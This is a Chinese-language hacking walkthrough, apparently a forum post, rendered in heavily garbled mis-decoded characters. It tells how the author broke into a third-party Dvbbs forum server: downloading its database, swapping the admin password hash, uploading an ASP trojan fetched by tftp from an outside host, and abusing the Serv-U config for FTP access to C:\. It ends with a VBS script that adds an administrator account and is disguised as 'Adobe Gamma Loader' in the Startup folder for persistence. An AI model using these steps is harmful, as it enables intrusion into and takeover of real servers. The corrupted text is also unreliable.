¤µ¤Ñ¤ß±¡¤£¦n¡A¼g¤@½g¤å³¹ª±ª±§a¡A§Q¥Îºô¯¸ªº°t¸m¿ù»~°t¦Xserv¡Ðu¨ú±oºÞ²zû³\¥iÅv¡A²³æ¤@ÂI´N¬O³q¹Lasp¤ì°¨°t¦Xserv¡Ðu¨ú±oºÞ²zû³\¥iÅv¡A«¢«¢«¢¡A¬O¤£¬O«Ücoolªü!
¡Ð¡Ð¡Ð¡Ð¡Ð¡Ð¡Ð¡Ð¡Ð¡Ð¡Ð¡Ð¤å³¹¶}©l¡Ð¡Ð¡Ð¡Ð¡Ð¡Ð¡Ð¡Ð¡Ð¡Ð¡Ð¡Ð
¬°¤F§äܤì³Â¦çªºmp3¡]³oÓ¤p©h®Qªººq«Ü¦nÅ¥ªü¡^¡A§â¥bÓ¤¬Ápºô³£·j§¹¤F¡]¤Ó¸Ø±i¤F§â)¡A´N¬O§ä¤£¨ì¡AWµM²´Ãè¤@«G¡A«¢«¢«¢¡Ñ¡Ñ¡Ñ½×¾Â¡A¬Ý¨Ó¤H®ð¤£¿ù¡A¤]¦³mp3ªº¤U¸ü¦a§}¡A¨º´N¥h¬Ý¬Ý§a
·w¡ã¡ã¡ã¡ã¡A
½×¾Â¿ù»~¸ê°T
²£¥Í¿ù»~ªº¥i¯àì¦]¡G
±z¬O§_¥J²Ó¾\Ū¤FÀ°§UÀÉ¡A¥i¯à±zÁÙ¨S¦³µn³°©ÎªÌ¤£¨ã¦³¨Ï¥Î·í«e¥\¯àªº³\¥iÅv¡C
ÁÙnµù¥Uªü¡A¥i¬O½×¾Â¥Ñ©óºØºØì¦]¤S¤£Åýµù¥U
®ðªº§Ú®tÂI¦R¦å¡I
«ç»ò¿ìªü¡H¡H¡Hü¥»·Q¥Î·¹³·¯}¸Ñ´XÓ±K½X¡C¥i¬O§Ú̳oÓ¸¨«áªº¦a¤è¤Wºô¶Q¡A³t«×ºC¡A¦³¨ºÓ¿ú¦´N¥i¥H¥h¶R´X±idª©cd¤F¡Aºâ¤F·Q·Q§Oªº¿ìªk§â¡A¥´¶}§Úªºxscan¡AÀH«K±½¤F¤@¤U¡A¦øªA¾¹®¼¦w¥þªü¡A¥u¶}¤F21¡A80¡A3389°ð
¬Ý¨Ó°µ¤F°ð¹LÂo
¨S¤°»ò¥i§Q¥Îªºº|¬}«ç»ò¿ì¡A¤£nµÛ«æ¡A¥L¥Îªº¬O°Êºô½×¾Â¡A¥ý¸ÕµÛ¤U¸ü¥Lªº¸ê®Æ®w¸Õ¸Õ§a
¤â°Êªº§ä¤F¤@¨Ç¡A³£¤£¦æ
§Ú¥ý²q¤@¤U¸ê®Æ®w¦bþӥؿýùر¡A¦pªG²q¹ïªº¸Ü¤U¸ü¸ê®Æ®wªº¦¨¥\²v´N¤ñ¸û°ª¤F
http://aaa.com/data
http://aaa.com/database
http://aaa.com/db
HTTP ¿ù»~ 404 - §ä¤£¨ìÀÉ
Internet ¸ê°TªA°È
Ä~Äò
http://aaa.com/mdb
HTTP ¿ù»~ 403 - ¸T¤î³X°Ý
Internet Explorer
§â§Ú¥H«e¨Çªº²K¥[ªº¸ê®Æ®w¦ì§}Àɸü¤Jxscan¡]±Mªù¤U¸ü¸ê®Æ®wªº¦ì§}¡^¡AµM«á¥u±½´ycgiº|¬}
scaning.......¡A¤j·§10¤ÀÄÁ¹L¥h¤F
±½´yµ²ªG
/mdb/lovemaik.asa [º|¬}´yz]
«¢«¢«¢¡A¦¨¥\ªº±½¨ì¤F¸ê®Æ®w
¶¶«K§i¶D¤j®a¤@Ó§Þ¥©¡A§â¤@¨Ç±`¥Îªº¸ê®Æ®w¦ì§}¦pdata.mdb,database.aspµ¥µ¥²K¥[¨ìxscanªºcgi¸ê®Æ®w¤¤¡A©ÎªÌ³æ¿W§@¤@Ó¸ê®Æ®w¡A§A¥i¥H¥Î¤@¨Ç¦r¨å¨Ó¥Í¦¨¸ê®Æ®w¦ì§}¡A³o¼Ëªº¦¨¥\²v«Ü°ªªº¡I
¥´¶}Net Transport¡]¤@ºØ«Ü²nªº¤U¸ü¤u¨ã¡^§â¸ê®Æ®wdown¹L¨Ó¡A¥Î¤F50¦h¤ÀÄÁ¡A²×©ó¤U¸ü§¹¤F
¦b¦Û¤vªº¾÷¾¹¤W¦w¸Ëjmail©M°Êºô½×¾Â¡A§â¤U¸üªº¸ê®Æ®wÂл\·s¸ê®Æ®w¡A±µµÛµù¥U¥Î¤á¡Gallen¡A±K½X¡G123456
½ÕµM«á§â¸ê®Æ®w°ÆÀɦW§ï¬°.mdb ,¥´¶}
¬d¬Ý§ÚÌè¤~µù¥Uªº¥Î¤á±K½X¬°49ba59abbe56e057(¥Ñ©ó½×¾Â¨Ï¥Îmd5¤£¥i°fºtºâªk¥[±K¡A©Ò¥H¤£¨º±o¨ì©ú¤å±K½X¡^
¦nªº§â³o¤@¦ê¸ê®Æ½Æ»s¤@¤U¡AµM«á§ä¨ìºÞ²zûªº¦W¦r¡A¤]´N¬O¬d§äuserclassªí¤¤¸ê®Æ¬°ºÞ²zûªº¦W¦r
§â¥Lªº±K½X§ï¦¨49ba59abbe56e057¡A°O¦í¦b§ï±K½X¤§«e¤@©wn§â¥Lªº±K½X¡]¸g¹LMD5¥[±K¹Lªº¡^½Æ»s¨ì¤@Ó°O¨Æ¥»ùØ
¦n¤F¡A§Ú̥κ޲zûªº¦W¦rµn³°¡A±K½X´N¬O123456¡A±µµÛ§ÚÌ´N¥h×§ï¥Î¤á¸ê®Æ¡A§â¦^µª°ÝÃD©Mµª®×§ï±¼¡I§âemail´«¦¨¦Û¤vªº¡A±µµÛ§âè¤~µù¥Uªº¥Î¤áallen´£¤É¬°ºÞ²zû¡A°h¥X¡A¦b¥Îallen±b¸¹µn³°¡A§âì¨ÓªººÞ²zû°¦¨´¶³q¥Î¤á¡A¥i¯à¦³¨Ç·|°Ý³o¼Ë°µ¬O¬°¤°»ò¡Aì¦]¬O°Êºô½×¾Â¤£¤¹³\ºÞ²zû³q¹Lemail¨ú¦^±K½X¡A±µµÛ¦b¥´¶}¸ê®Æ®w§âì¨ÓºÞ²zûªº±K½Xµ¹«ì´_¤F¡A¦b¥´¶}½×¾Â¡A§Ñ°O±K½X¡Ð¦^µª°ÝÃD¡Ð¨ú¦^±K½X¡A«¢«¢«¢¡A§Ö¥´¶}§Aªº«H½c§â¡A±K½X¤w¸gµo¨ì§A«H½c¤F¡]ª`·N¡A§Aªº¨t²Î³Ì¦n¸Ëjmailµ¥¶l¥óµo°e¤¸¥ó¡An¤£µM´N·|µo¤£¤F¶l¥óªº¡^
²{¦b§ÚÌ®³¨ì¤F½×¾ÂºÞ²zûªº±K½X¤F¡Aµn³°¨ºÓ½×¾Â¡Ð¶i¤JºÞ²z¶±¡Ð½×¾Âª©±ºÞ²z ¡ÐÀH«K¿ï¤@Ó°Q½×°Ï¡Ð¦b¤W¶ÇÀÉÃþ«¬¤¤¥[¤W.asp¡A¨þ¨þ
¦n¤F¡A¶i¥h³oÓ°Q½×°Ïµoªí©«¤l¡Ð¤W¶ÇÀÉ¡A¨þ¨þ¡A§âasp¤ì°¨¶Ç¤W¥h
¦n¤F¡A¥i¬O³oÓÀɳQ«©R¦W¤F¡Aü¡A·sÁ«¤âùØÁÙ¦³¤@Ó§Kfsoªº¤ì°¨¡A¥u¦³¤@ÓÀÉ¡C¶Ç¤W¥h
¥i±¤³oӤ차¤£¦n¥Î¡AÁÙ¬O¦Û¤vªº¤ì°¨¥ÎµÛ¶¶¤â¡A©ó¬Otftp -i ***.***.***.*** GET use.asp
¦n¤F¡A¦¨¥\¤F¡A±µ³o¹B¦æ¤ì°¨www.***.com/bbs/use.asp?id=1
¨þ¨þ¡A¦øªA¾¹ªºªF¦è²M²M·¡·¡ªºÂ\¦b§Ú̱«e¤F¡A¤W¶Ç¤@Ówinshell§â
¾a¡A¦øªA¾¹¦³¯f¬r¨¾¤õÀð¡A¬Ý¬Ý¬Onavªº¡Aºâ¤F¡A¦Û¤v¥[Ó´ß§â
Ä~Äò¡A¶Ç¤W¥h¨Ã°õ¦æ¡C¡C¡C¡C¨S¤ÏÀ³¡I
¥ýtelnet ip 8210¡]§Ú³ßÅw¥Înoika¤â¾÷ªº«¬¸¹°µ¬°°ð¡A^_^¡^
¾a¡A¤£¦æ¡A®tÂI§Ñ¤F¡A¹ï¤è°µ°ð¹LÂo¤F
«ç»ò¿ìªü¡A¸Õ¸Õidq.dll¡]¨S³ø¤°»ò§Æ±æ¡^¡AªGµM¹ï¤èªº¥Ø¿ý¤£¥i°õ¦æ¡A¦b¬Ý¤@¤U¹ï¤è¦³¨S¦³¸Ëperl
ÁÙ¬O¨S¦³!¦b¬Ý¬Ý¹ï¤è¬O¤°»ò¤À°Ï®æ¦¡¡An¬Ofat32¨º´N¦n¿ì¤F¡A¸ÕµÛ§R°£c:\ªº¥ô¦óÀɳ£´£¥Ü¨S¦³³\¥iÅv¡Iü¡A³Â·Ðªü¡I¡I¡I
¥»¨Ó·Q´N¦¹¥´¦íªº®ÉÔ¬ðµMµo²{¤Fd:\Serv-U¡A©ó¬O§Ú´N·Q³q¹L¥L¨Ó®³¨ì³\¥iÅv
ª`¡G¦b¦¹¤§«e³Ì¦n¦b¦Û¤vªº¾÷¾¹¤W¸Ë¤@ÓServ-U,
§ÚÌ¥ý¬Ý¬ÝServUStartUpLog.txt
Sat 01Mar01 12:15:24 - Serv-U FTP Server v4.0 (4.1.0.0) - Copyright (c) 1995-2002 Cat
¡C¡C¡C¡C¡C¡C¡C¡C¡C¡C
ª©¥»®¼·sªü¡A¨þ¨þ
±µµÛ¬Ý¬ÝServUDaemon.ini¡]¥Î¤á°t¸mÀÉ¡^
«z¦Ò¡Aùرªº¥Î¤á¯u¦hªü¡I
±µµÛ§Ú̧â³oÓÀɪº¤º®e½Æ»s¤@¤U¡AµM«áÖß¶K¨ì¥»¦aserv¡ÐuªºServUDaemon.iniÀɤ¤¡A°O¦í³o®ÉԳ̦n°±±¼§Aªºserv¡Ðu¡A«O¦sÀÉ¡A±µµÛ¥´¶}ServUAdmin.exe¡A«·s²K¥[¤@ӥΤá¡A°O¦í³oӥΤá³Ì¦n¬OºÞ²zû³\¥iÅv¡A¥²¶·¹ï¥Ø¿ý©MÀÉ¥i¥H¶i¦æÅª¼g¥i°õ¦æµ¥¤@¤Á¾Þ§@¡A±µµÛ§â¥Î¤á¥D¥Ø¿ý³]¬°c:\
«¢«¢«¢¡A¨ì¦¸¬°¤î¤j®a³£ª¾¹D§Úªº¥Î·N¤F§â¡I
±µ³oftp¤W¥h
«¢«¢c½LªºªF¦è¥þ³¡¼ÉÅS¤F¡A²{¦b§Ú̹ïc½L¦³Åª¼g³\¥iÅv¡A¥i¥H¶i¦æ¥ô¦ó¾Þ§@¡]ª`·N¡Gserv¡ÐuªººÞ²zû³\¥iÅv©MntªººÞ²zû³\¥iÅv¤£¬O¤@¼Ëªº¡Aserv¡ÐuªººÞ²zû¥u¯à°t¸mserv¡Ðu¡^
¥Ñ©ó¹ï¤è°µ¤F°ð¹LÂo¡A¿ìªk¤£¬O«Ü¦h¡A¥i¥H°Ñ¦Ò¤@½g×§ïµù¥Uªí®Ú§ï°ð¹LÂoªº¤å³¹¡A¬O¦Ç¦ây¸ñ½×¾Âªº¤@Óºô¤Í¼gªº¡A«¢«¢¡A¦b³oùØ´N¤£¦h»¡¤F¡I
§ÚÌ¥ý¼g¤@Óvbs¸}¥»¡A§â³oÓ¸}¥»«©R¦W¬°Adobe Gamma Loader¡A³o¼ËºÞ²zû¤£®e©öµo²{¡I
¸}¥»¤º®e¡G
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c net user allen ***** /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators allen /add",0)
¤j®a³£¯à¬ÝÀ´§â¡A«¢«¢
µM«á§â¥L¶Ç¨ìDocuments and Settings\All Users\¡u¶}©l¡v¥\¯àªí\µ{¦¡\±Ò°Ê\
³d¥ô½s¿è:
·ÀH¦æ


